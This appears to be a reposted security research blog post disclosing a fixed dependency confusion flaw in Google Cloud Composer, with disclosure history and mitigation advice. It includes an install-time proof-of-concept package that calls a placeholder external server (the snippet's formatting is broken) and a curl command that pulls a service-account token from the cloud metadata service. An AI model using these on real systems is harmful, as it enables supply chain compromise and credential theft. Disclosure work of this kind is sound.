CloudImposer: Executing Code on Millions of Google Servers with a Single Malicious Package

by nlqip

Tenable Research discovered a remote code execution (RCE) vulnerability in Google Cloud Platform (GCP) that is now fixed and that we dubbed CloudImposer. The vulnerability could have allowed an attacker to hijack an internal software dependency that Google pre-installs on each Google Cloud Composer pipeline-orchestration tool. Tenable Research also found risky guidance in GCP documentation that customers should be aware of.

TL;DR

- Tenable Research discovered an RCE vulnerability we dubbed CloudImposer that could have allowed a malicious attacker to run code on potentially millions of servers owned by Google and by its customers.

- Tenable Research discovered CloudImposer after finding documentation from GCP and the Python Software Foundation that could have put customers at risk of a supply chain attack called dependency confusion. The affected GCP services are App Engine, Cloud Function, and Cloud Composer. This research shows that although the dependency confusion attack technique was discovered several years ago, there’s a surprising and concerning lack of awareness about it and about how to prevent it even among leading tech vendors like Google.

- Supply chain attacks in the cloud are exponentially more harmful than on premises. For example, one malicious package in a cloud service can be deployed to – and harm – millions of users.

- A combination of responsible security practices by both cloud providers and cloud customers can mitigate many risks associated with cloud supply chain attacks. Specifically, users should analyze the package installation process in their environments, in particular any use of the --extra-index-url argument in Python, to prevent breaches.

- This research was presented at Black Hat USA 2024.

Supply chain attacks in the cloud

In supply chain attacks, attackers infiltrate the supply systems of legitimate providers. When the provider inadvertently distributes the compromised version of its software, its users become vulnerable to an attack, leading to widespread security breaches.

In the cloud, supply chain attacks escalate to a whole new level, almost like traditional attacks on steroids. The cloud’s massive scale and widespread adoption, as well as its interconnected and distributed nature, magnify these threats.

This blog details a vulnerability Tenable Research discovered called CloudImposer that could have allowed attackers to conduct a massive supply chain attack by compromising the Google Cloud Platform’s Cloud Composer service for orchestrating software pipelines.

Specifically, CloudImposer could have allowed attackers to conduct a dependency confusion attack on Cloud Composer, a managed service version of the popular open-source Apache Airflow service.

A type of supply chain attack, dependency confusion happens when an attacker inserts a malicious software package in a software provider’s software registry. If the software provider inadvertently incorporates the malicious package in one of its products, the product becomes compromised.



The “apache-airflow” Python package of the Apache Airflow system – an open-source system that handles data pipelines and workflows – had been downloaded nearly 22 million times as of June 2024:

(Source: pypistats.org)

Consider Google Cloud Composer, Google’s managed service version of Apache Airflow. With such a high adoption rate, the impact of a single malicious package deployed within Google Cloud Composer could be staggering. We’re no longer talking about an isolated incident affecting just one server or data center; we’re looking at a potential ripple effect that could compromise millions of users across numerous organizations.

These figures highlight the immense scale of the potential damage that attackers could have inflicted upon Google and its customers if they had exploited CloudImposer.

Because a single vulnerability in a specific cloud service can lead to widespread breaches, it’s essential to secure the entire software supply chain in the cloud.

What’s a dependency confusion attack?

Discovered by Alex Birsan in 2021, a dependency confusion attack starts when an attacker creates a malicious software package, gives it the same name as a legitimate internal package and publishes it to a public repository. When a developer’s system or build process mistakenly pulls the malicious package instead of the intended internal one, the attacker gains access to the system. This attack exploits the trust developers place in package management systems and can lead to unauthorized code execution or data breaches.



The confusing and confused “--extra-index-url” argument

In Python specifically, the popular argument that causes the confusion is “--extra-index-url”:

This argument tells pip to search the public registry (PyPI) in addition to the specified private registry from which the application or user intends to install the private dependency.

This behavior opens the door for attackers to carry out a dependency confusion attack: upload a malicious package with the same name as a legit package to hijack the package-installation process.

Dependency confusion typically relies on package versioning: when “pip”, the Python package installer, sees two registries offering packages with the same name, it prioritizes the package with the higher version number.
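The version-based prioritization described above can be sketched in a few lines. This is an illustrative model only, not pip's resolver code; the registry labels, the version numbers and the `pick_candidate` helper are hypothetical, and it handles only simple dotted numeric versions.

```python
# Illustrative model only: this is not pip's actual resolver code.
def parse_version(version: str) -> tuple[int, ...]:
    """Turn a simple dotted version such as '1.2.10' into (1, 2, 10)."""
    return tuple(int(part) for part in version.split("."))


def pick_candidate(candidates: list[tuple[str, str]]) -> tuple[str, str]:
    """Return the (registry, version) pair with the highest version number."""
    return max(candidates, key=lambda item: parse_version(item[1]))


# Hypothetical package offered under the same name by two registries.
candidates = [
    ("private-registry", "1.0.0"),  # the legitimate internal build
    ("pypi", "99.0.0"),             # an attacker's upload with an inflated version
]
print(pick_candidate(candidates))
```

In this model the attacker only needs to publish a higher version number than the internal package for the public copy to be selected.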

However, the CloudImposer vulnerability shows how dependency confusion can be exploited in stricter circumstances than the ones presented in a simple dependency confusion scenario. We will showcase a unique case study with CloudImposer, where things get much more confusing, for us and for pip 😉

GCP services research: Documentation gone wrong

Among our first findings were three instances of risky, ill-advised guidance for users of the GCP services App Engine, Cloud Function and Cloud Composer. Specifically, Google advised users who want to use private packages in these GCP services to use the “--extra-index-url” argument.

We can infer that, as of today, numerous GCP customers have followed this guidance and use this argument when installing private packages in the affected services. These customers are at risk of dependency confusion, and attackers might execute code in their environments.



See screenshots below of the GCP documentation we’re referring to.

(Source: Google Cloud Function documentation)



We didn’t stop with Google Cloud Function. We then analyzed the state of GCP regarding this risky argument we discussed, and used Google Dorking to find more problematic documentation:

(Source: Google App Engine documentation)



(Source: Google Cloud Composer documentation)

The question arises: Why?





Why did Google provide this recommendation? It appears there’s a general lack of awareness about dependency confusion risk. As we dove deeper into Google’s documentation, we found a prompt in the GCP Artifact Registry documentation for users to review Python’s Packaging documentation:

Delving deeper into the Python Packaging documentation, we can observe an interesting recommendation: Python advises users to host their own simple repositories – in other words, their private ones. And again Python recommends that these private-repository users install packages with the… “--extra-index-url” argument:

It appears that Google simply echoed the Python Software Foundation’s recommendation, which shows a huge knowledge gap about how to secure the installation of private packages.

Disclosure to Google

We reported the problematic documentation to Google, which then updated its documentation. We explain the documentation changes further down.

Disclosure to the Python Software Foundation

We also reported the risky documentation of Python to the Python Software Foundation, which responded by sharing the following Python Enhancement Proposal (PEP) paper: “PEP 708 – Extending the Repository API to Mitigate Dependency Confusion Attacks”. This PEP was created in February 2023 but no implementation has been accepted or completed yet, so a dependency confusion risk remains for Python users.

CloudImposer vulnerability discovery

Pre-installed Python packages

After finding Google’s risky recommendation for GCP customers to use the “--extra-index-url” argument when installing private packages, we wondered if Google itself followed this practice when installing private packages in its own internal services.



To find out, we looked first at Cloud Composer and found this table in its documentation:

Every time a user creates a Cloud Composer service, Google deploys an image of the Apache Airflow system.

Google also bundles the required services for Cloud Composer to work, including … PyPI packages. These PyPI packages would be pre-installed in potentially millions of Cloud Composer instances.

Cloud Composer’s documentation reads:

“Preinstalled PyPI packages are packages that are included in the Cloud Composer image of your environment. Each Cloud Composer image contains PyPI packages that are specific for your version of Cloud Composer and Airflow.”

The PyPI packages are public popular Python packages, but could some be internal Google packages?

The researcher mindset started to tingle.

Scanning for hijacking potential

The next order of business was to take the package list of Cloud Composer from the documentation and scan for missing packages from the public registry. We reasoned that if a package is missing from the public registry, it must be present in an internal one.

We used the following mock-up Python code to complete the mission of scanning the packages:

    import requests


    def check_packages(file_path):
        """Report which package names listed in the file are missing from public PyPI."""
        with open(file_path, 'r') as file:
            for package_name in file:
                package_name = package_name.strip()
                if not package_name:
                    continue  # skip blank lines in the list
                url = f'https://pypi.org/simple/{package_name}'
                response = requests.get(url, timeout=10)
                status_code = response.status_code
                print(f'Package: {package_name}, Status Code: {status_code}')
                # Anything other than 200 means the name is not served by PyPI.
                if status_code != 200:
                    print('This package is missing from the public registry:')
                    print(f'Status Code: {status_code}, Package: {package_name}')


    check_packages('./package-names.txt')

The code checks whether each package is present in the public registry:




We found that the “google-cloud-datacatalog-lineage-producer-client” package is not present in the public registry, which opens the door for attackers to confuse the installation process.

Revealing Cloud Composer’s package installation process

To validate our theory, we revealed Cloud Composer’s package installation process by running code on our own Cloud Composer service. This is allowed by the nature of the service, and any ordinary user or customer of Google Cloud Composer can do it. We grepped the file system of the service for the internal package string “google-cloud-datacatalog-lineage-producer-client” to look for data, or any trail, that would help with the research.
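A search like the one described above could be approximated in Python as follows. This is a minimal sketch rather than the command we actually ran: the `find_string_in_files` helper and the demo file names are hypothetical, and it reads each file fully into memory, which is fine for a demo but not for very large files.

```python
import os
import tempfile


def find_string_in_files(root: str, needle: str) -> list[str]:
    """Return sorted paths of files under root whose contents include needle."""
    matches = []
    needle_bytes = needle.encode("utf-8")
    for dirpath, _dirnames, filenames in os.walk(root):
        for filename in filenames:
            path = os.path.join(dirpath, filename)
            try:
                with open(path, "rb") as handle:
                    if needle_bytes in handle.read():
                        matches.append(path)
            except OSError:
                continue  # unreadable files are skipped
    return sorted(matches)


# Demo against a throwaway directory; the file names are made up.
with tempfile.TemporaryDirectory() as demo_root:
    with open(os.path.join(demo_root, "METADATA"), "w") as handle:
        handle.write("Name: google-cloud-datacatalog-lineage-producer-client\n")
    with open(os.path.join(demo_root, "other.txt"), "w") as handle:
        handle.write("nothing to see here\n")
    hits = find_string_in_files(
        demo_root, "google-cloud-datacatalog-lineage-producer-client"
    )
    print([os.path.basename(path) for path in hits])
```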

We found the following package metadata, which reveals bad news:

To install its own private package, the one we found missing from the public registry, Google used the risky --extra-index-url argument.

A unique dependency confusion case study: Tackling versioning prioritization

We now have all of the ingredients for a dependency confusion attack: We found a package that is not present in the public registry, and that is installed in a risky way that allows attackers to upload a malicious package to the public registry, and take over the pipeline.

Recall that in the basic dependency confusion example, installation is prioritized based on a package’s version. When we looked at the pre-installed packages in the Cloud Composer documentation, we saw a barrier, but we didn’t stop there:

The Cloud Composer documentation mentions that the package we found is version-pinned, meaning that pip will only install the package with this exact version number. If so, then a conventional dependency confusion attack technique wouldn’t be successful.

Or would it?

To our surprise, when “pip install” uses the “--extra-index-url” argument, it prioritizes the public registry even if the two packages have identical names and versions and the requirement is version-pinned.
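The outcome we observed can be expressed as a small model. It is only a sketch of the behavior reported here, not pip's implementation: the `resolve_pinned` helper, the registry labels and the version number are hypothetical, and the tie-breaking order is an assumption taken directly from our observation.

```python
def resolve_pinned(pinned_version, offers, preference):
    """Pick the registry that supplies a pinned version.

    offers: dict mapping a registry label to the set of versions it serves.
    preference: registry labels in the order in which ties are broken.
    """
    matching = [
        registry for registry in preference
        if pinned_version in offers.get(registry, set())
    ]
    return matching[0] if matching else None


offers = {
    "private-registry": {"1.0.0"},
    "pypi": {"1.0.0"},  # attacker publishes the same name and the same version
}
# Assumption based on the behavior we observed: the public registry wins ties.
reported_preference = ["pypi", "private-registry"]
print(resolve_pinned("1.0.0", offers, reported_preference))
```

The pin removes the attacker's version-number advantage, but it does not say which registry should supply the pinned version, so the choice falls to the tie-breaking order.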

We then emulated the installation process on our own Cloud Composer instance and crafted a proof of concept (POC). The POC was a package that runs code on package installation. The code sends requests to our external server so that we can validate that we ran code on the targeted Google servers. We can confirm whether the servers are owned by Google by inspecting the external IP address of each request:

import requests

def hits_checker():

url = "https://mockup-external-poc-server.com"

response = requests.get(url)

if __name__ == "__main__":



print(hits_checker())We uploaded the POC package, with the same name of the internal Google’s package, and the same version:



And we started to get hundreds of requests, validating that we ran code in Google internal servers:

But then, we got blocked in a matter of seconds.

A hidden protection mechanism in PyPI?



To comply with the bug bounty and research rules, we went into PyPI to delete our POC package and our user after we validated that we ran code and that there was a risk.

But when we logged in to our account, we were suddenly presented with this message:

Turns out that our user and package got blocked by PyPI. Granted, we did not employ any evasion and stealth techniques since our purpose was to conduct research. Still, this is good news. We’re happy that PyPI has a defense mechanism designed to block real-world threats.

Trails from the past



A user named “Feluxe” submitted a GitHub issue in 2018, asking how “pip install” behaves with multiple indexes:

Like us in 2024, Feluxe realized six years ago that PyPI, the public registry, is always prioritized.

The answer from the Python Software Foundation at the time was that this issue was unlikely to be addressed. Thus, the threat is real and still exists. Users should be aware of the aforementioned risks and take action.

The aftermath: Going beyond RCE exploitation and the Jenga concept

The Jenga concept

In our recent Black Hat USA 2024 talk, “The GCP Jenga Tower: Hacking Millions of Google’s Servers With a Single Package (and more)”, we explored a new concept that is present in the major cloud providers.

We dubbed this concept “Jenga,” just like the game. Cloud providers build their services on top of each other. If one service gets attacked or is vulnerable, the other ones are prone to be impacted as well. This reality opens the door for attackers to discover novel privilege escalations and even vulnerabilities, and introduces new hidden risks for defenders.



Meet Jenganizer, a revealer of hidden services for AWS

To help cloud security teams get more visibility into cloud interconnected services, we released a new open-source tool named “Jenganizer” that maps the hidden services AWS builds behind the scenes:

(https://github.com/tenable/hidden-services-revealer)

Although Jenganizer works only for AWS, the issue it addresses – the complicated morass of interconnected cloud services layered on top of each other – affects all cloud providers.

Beyond RCE: Abusing Jenga in Cloud Composer

We can apply the Jenga concept to Cloud Composer as well. Its infrastructure is built on GKE (Google Kubernetes Engine), another GCP service, just like the concept describes – a service built on top of another service.

Attackers could build on CloudImposer by using tactics, techniques, and procedures that target GKE. After running code on Cloud Composer, attackers could run code on a pod, abuse the service by accessing the instance metadata service (IMDS), and get the attached service account from the deployed node to escalate their privileges and move laterally in the victim’s environment:

    curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/[email protected]/token"

Responsible disclosure

We responsibly disclosed the CloudImposer vulnerability, along with the risky documentation, to Google. Google classified CloudImposer as an RCE vulnerability and responded promptly and professionally, demonstrating a commitment to security by thoroughly investigating the issue and taking appropriate actions to mitigate the risk.

The vulnerability fix and extra steps taken by Google

CloudImposer fix

Following our report, Google fixed the vulnerable script that was using the --extra-index-url argument when installing its private package from its private registry in Google Cloud Composer.

Google also inspected the checksum of the vulnerable package instances and notified us that, as far as Google knows, there is no evidence that CloudImposer was ever exploited.

Google acknowledged that our code ran in Google’s internal servers, but said that it believes it wouldn’t have run in customers’ environments because it wouldn’t pass the integration tests.



Documentation issues

Google now recommends that GCP customers use the “--index-url” argument instead of the “--extra-index-url” argument. Google is also adopting our suggestion and recommending that GCP customers use the GCP Artifact Registry’s virtual repository to safely control pip search order:

The --index-url argument reduces the risk of dependency confusion attacks by only searching for packages in the registry that was defined as a given value for that argument.
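To act on this guidance, teams can look for the risky argument in their own requirements files and pip configuration. The following is a minimal sketch under stated assumptions: the `find_extra_index_lines` helper, the sample file contents and the `private.example.com` URL are hypothetical, and the check is a simple text match that skips only `#` comments, not a full parser.

```python
import re

# Matches the command-line/requirements-file option, or the
# "extra-index-url" key as it appears in a pip configuration file.
RISKY_PATTERN = re.compile(r"(--extra-index-url\b|^\s*extra-index-url\s*=)")


def find_extra_index_lines(text: str) -> list[tuple[int, str]]:
    """Return (line number, stripped line) pairs that reference an extra index."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if stripped.startswith("#"):
            continue  # ignore comment lines
        if RISKY_PATTERN.search(line):
            findings.append((number, stripped))
    return findings


# Hypothetical requirements file contents.
sample = """\
# requirements.txt
--extra-index-url https://private.example.com/simple/
requests==2.31.0
--index-url https://private.example.com/simple/
"""
for number, line in find_extra_index_lines(sample):
    print(f"line {number}: {line}")
```

Only the second line of the sample is flagged; the --index-url line is not, because it replaces the default registry instead of adding to it.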
